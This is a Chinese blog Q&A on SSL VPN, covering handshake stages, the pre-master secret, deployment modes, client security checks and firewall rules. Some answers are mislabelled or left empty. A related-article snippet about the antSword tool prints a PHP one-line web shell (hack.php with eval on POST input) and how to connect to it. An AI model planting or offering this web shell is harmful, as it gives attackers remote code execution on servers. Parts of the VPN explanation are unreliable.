网络防御之SSL VPN

news2024/12/23 17:13:42

1. SSL工作过程是什么?

第一阶段:

        客户端发送client hello消息到服务端,服务端收到client hello消息后,再发送server hello消息到客户端。

第二阶段:

        服务器的证书,用于客户端给客户端发送信息时加密

        server key exchange服务端密钥交换:决定密钥交换的方式,比如 DH,RSA ,会包含密钥交换所需的一系列参数。

 第三阶段:

        sever key exchange客户端密钥交换:根据服务端随机数算出一个 pre-master ,发给服务器,服务器收到后根据pre-master 密钥生成一个 main-matser
第四阶段:

2. SSL预主密钥有什么作用?

        预主密钥会结合着客户端随机数和服务端随机数一起生成一个主密钥,主密钥会产生共享密钥、HMAC认证秘钥和初始化向量

3. SSL VPN主要用于那些场景?

        虚拟网关技术:SSL VPN的每个虚拟网关可以独立管理,可以配置各自的资源、用户、认证方式以及管理员,并且相互隔离。

        WEB代理技术:实现对内网web的访问,内网资源只有私网地址,在不做nat的情况下,可以通过SSL VPN实现对其代理的安全访问。

        文件共享:协议转换技术,无需客户端,直接通过浏览器安全访问转换为内网文件共享的相应协议格式。

        端口转发:

(1)提供内网的TCP访问,C/S资源

(2)提供丰富的静态端口的TCP应用

(3)动态端口的TCP应用提供端口级访问控制

        网络拓展: 

4. SSL VPN的实现方式有哪些?详细说明

(1)SSL Portal VPN:也称为WebVPN,通过浏览器提供远程访问应用和资源的方式。用户通过浏览器登录到SSL VPN门户网站,然后可以通过门户网站提供的应用程序代理或文件共享等功能,安全地访问内部网络资源。此方式通常使用基于Web的SSL VPN客户端。

(2)SSL Tunnel VPN:也称为Network-Level VPN,通过SSL VPN客户端在本地设备上创建一个安全隧道来连接到企业内部网络。用户需事先下载SSL VPN客户端,并使用认证凭证登录该客户端。SSL VPN客户端将本地设备与远程VPN服务器之间建立安全连接,使用户可以像在本地网络中一样访问内部资源。

5. SSL VPN客户端安全要求有哪些?

(1)主机检查:杀毒软件检查、防火墙设置检查 、注册表检查、端口检查、进程检查、操作系统检查

(2)缓存清除: internet 临时文件、浏览器自动保存密码、cookie记录、浏览器访问历史记录收回站和最近打开的文、指定文件或者文件夹
(3)认证授权: vpndb 认证授权、 第三方服务认证授权、 数字证书的认证、 短信辅助认证

6. SSL VPN的实现,防火墙需要放行哪些流量?

(1)SSL/TLS流量(通常使用TCP协议):SSL VPN通过SSL/TLS协议进行加密和身份验证。防火墙需要允许SSL VPN流量通过,以确保用户可以建立与SSL VPN服务器的安全连接。

(2)VPN协议流量:SSL VPN使用特定的VPN协议进行通信,例如OpenVPN,Cisco AnyConnect等。防火墙需要配置规则,允许相应的VPN协议流量通过。

(3)DNS流量:SSL VPN客户端可能需要进行DNS查询,以解析主机名和域名。防火墙需要允许SSL VPN客户端的DNS流量通过,以便进行正常的名称解析。

(4)认证流量:SSL VPN客户端与认证服务器之间会有认证流量传输,用于验证用户身份。防火墙需要允许此流量通过,以确保用户能够成功进行身份验证。

(5)内部网络资源流量:一旦SSL VPN连接建立成功,用户将能够访问内部网络资源,如文件共享、数据库等。防火墙需要根据组织策略,允许SSL VPN用户访问特定的内部网络资源。

(6)更新和维护流量:SSL VPN客户端可能需要进行更新和维护操作,以获取最新的安全补丁或软件功能。防火墙需要允许相应的流量通过,以确保SSL VPN客户端能够及时更新。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/856578.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

韩顺平Linux基础篇

一、课程内容 二、Linux应用领域 一、Linux使用在哪些地方 Linux最强应用:服务器 三、Linux概述 三、Linux和Unix的关系 五、VM和Linux的安装 基本说明 学习Linux需要一个环境,我们需要创建一个虚拟机,然后再虚拟机上安装一个Centos系统来学…

将 Kwargs 传递给 Python 中的另一个函数

文章目录 Python 中的关键字参数在 Python 中使用**kwargs 调用函数使用 Python 将 kwargs 传递给另一个函数总结 Python 列出了可以传递给程序中的函数的两种类型的参数。 非关键字参数 (**args) 和关键字参数 (**kwargs)。 通常,python 函数必须使用正确数量的参…

春秋云镜 CVE-2022-24124

春秋云镜 CVE-2022-24124 Casdoor api 获取组织 SQL注入 靶标介绍 Casdoor是开源的一个身份和访问管理(IAM)/单点登录(SSO)平台,标记支持OAuth 2.0 / OIDC和SAML身份验证的Web UI。 Casdoor 1.13.1之前存在安全漏洞&…

Unity导入图片时,通过设置属性快速实现资源的压缩

是在学习tilemap绘制世界地图的时候发现的这个功能。 之前一直只是粗略的知道这部分是对应图片资源的压缩的。比如Compression是指的压缩质量,想要完全不压缩就设置None,会导致图片资源会大一些。 在我的例子工程中,其他图片资源的尺寸都是6…

服务器数据恢复-RAID5上层Hyper-V虚拟机数据恢复案例

服务器数据恢复环境: 一台Windows Server服务器,部署Hyper-V虚拟化环境,虚拟机的硬盘文件和配置文件存放在一台DELL存储中。该存储中有一组由4块硬盘组建的RAID5阵列,用来存放虚拟机的数据文件,另外还有一块大容量硬盘…

Centos7.6 安装mysql过程全记录

在centos 7.6上 离线安装mysql 的步骤,可参考下文: 一、查看当前MySQL的安装情况并卸载 1. 查看当前MySQL的安装情况 查找之前是否安装了MySQL rpm -qa|grep -i mysql 2.卸载mysql 如果已经安装mysql,则需要先停止MySQL,再删除…

基于springboot+vue的幼儿园管理系统的设计与实现_5umt6

随着世界经济信息化、全球网络化的到来推动信息线上管理的飞速发展,为幼儿园行业的改革起到关键作用。若想达到安全,快捷的目的,就需要拥有信息化的组织和管理模式,建立一套合理、畅通、高效的幼儿园管理系统。当前的幼儿园管理系…

【JAVA】继承

作者主页:paper jie的博客 本文作者:大家好,我是paper jie,感谢你阅读本文,欢迎一建三连哦。 本文录入于《JAVASE语法系列》专栏,本专栏是针对于大学生,编程小白精心打造的。笔者用重金(时间和精…

vue3官网文档学习、复习笔记(快速上手)

目录 2.Attribute 绑定(v-bind) 3.事件监听(v-on) 4.表单绑定(v-model) 5.条件渲染(v-if) 6.列表渲染(v-for) all.value all.value.filter(…

[C++]类与对象(下) -- 初始化列表 -- static成员 -- 友元 -- 内部类,一篇带你深度了解。

目录 1、再谈构造函数 1.1 构造函数体赋值 1.2 初始化列表 1.2.1 初始化列表的意义 1.3 explicit关键字 2、static成员 2.1 问题引入 2.2 特性 3、友元 3.1 友元函数 3.2 友元类 4、内部类 1、再谈构造函数 1.1 构造函数体赋值 在创建对象时,编译器通…

改进的麻雀算法优化最大相关峭度解卷积(SCSSA-MCKD),实现早期微弱故障诊断,MATLAB代码实现

01 引言 由于一些设备的早期故障产生的冲击十分微弱,易被系统噪声干扰,如何有效地对设备的原始故障信号进行降噪并增强信号中微弱冲击成分,是进行该类部件早期故障诊断的关键。 最大相关峭度解卷积(MCKD)通过解卷积运算…

干翻Dubbo系列第九篇:Dubbo体系中序列化详解

文章目录 文章说明 一:序列化概念 1:概念 2:Dubbo中序列化方式 二:Kyro序列化方案 1:引入依赖 2:XML的配置方式 3:Boot的方式 4:Consumer端调用 三:FST序列化方…

JVM 调优实例

点击下方关注我,然后右上角点击...“设为星标”,就能第一时间收到更新推送啦~~~ JVM提供了多种垃圾回收器,可以根据应用程序的需求选择最适合的垃圾回收器。例如,如果应用程序需要更快的响应时间,可以选择并行垃圾回收…

GIS在地质灾害危险性评估与灾后重建中的应用教程

详情点击链接:GIS在地质灾害危险性评估与灾后重建中的实践技术应用 前言 地质灾害是指全球地壳自然地质演化过程中,由于地球内动力、外动力或者人为地质动力作用下导致的自然地质和人类的自然灾害突发事件。由于降水、地震等自然作用下,地质…

【JavaSE】接口的语法知识和使用方法总结

目录 1. 接口的概念 2. 语法规则 3. 接口特性 4. 接口使用 5. 实现多个接口 6. 接口间的继承 1. 接口的概念 在现实生活中,接口的例子比比皆是,比如:笔记本上的USB口,电源插座等。 电脑的USB口上,可以插&#x…

Unity游戏源码分享-仿开心消消乐Match3Jewel

Unity游戏源码分享-仿开心消消乐Match3Jewel 工程地址: https://download.csdn.net/download/Highning0007/88198762

蚁剑antSword-maste下载-安装-使用-一句话木马

下载 https://github.com/AntSwordProject/antSword 一句话木马 hack.php脚本 <?php eval($_POST[attack]);?> 安装 1、安装完成后启动 2、初始化&#xff0c;选择有源码的目录 3、连接

为什么要使用融合CDN,单CDN与多CDN之间的差异对比

CDN是现代互联网服务的重要组成部分&#xff0c;它CDN可帮助内容提供者高速交付内容&#xff0c;不同的服务器部署在全球不同的数据中心&#xff0c;并在它们之间共享相同的网络路径。随着企业意识到CDN的重要性&#xff0c;越来越多的企业正在使用CDN作为内容分发工具。互联网…

RocketMQ发送消息失败:error CODE: 14 DESC: service not available now, maybe disk full

在执行业务时&#xff0c;发现MQ控制台没有查询到消息&#xff0c;在日志中发现消息发送失败&#xff0c;报错error CODE: 14 DESC: service not available now, maybe disk full 分析报错应该是磁盘空间不足&#xff0c;导致broker不能进行正常的消息存储刷盘&#xff0c;去查…

Java中数组分析

Java中数组分析 先进行专栏介绍 数组声明和初始化一个数组方法一&#xff1a;声明数组并分配空间&#xff1a;可以使用以下语法声明一个数组&#xff0c;并指定数组的长度。举例 方法二&#xff1a;声明数组并初始化元素&#xff1a;可以在声明数组时&#xff0c;同时为数组的元…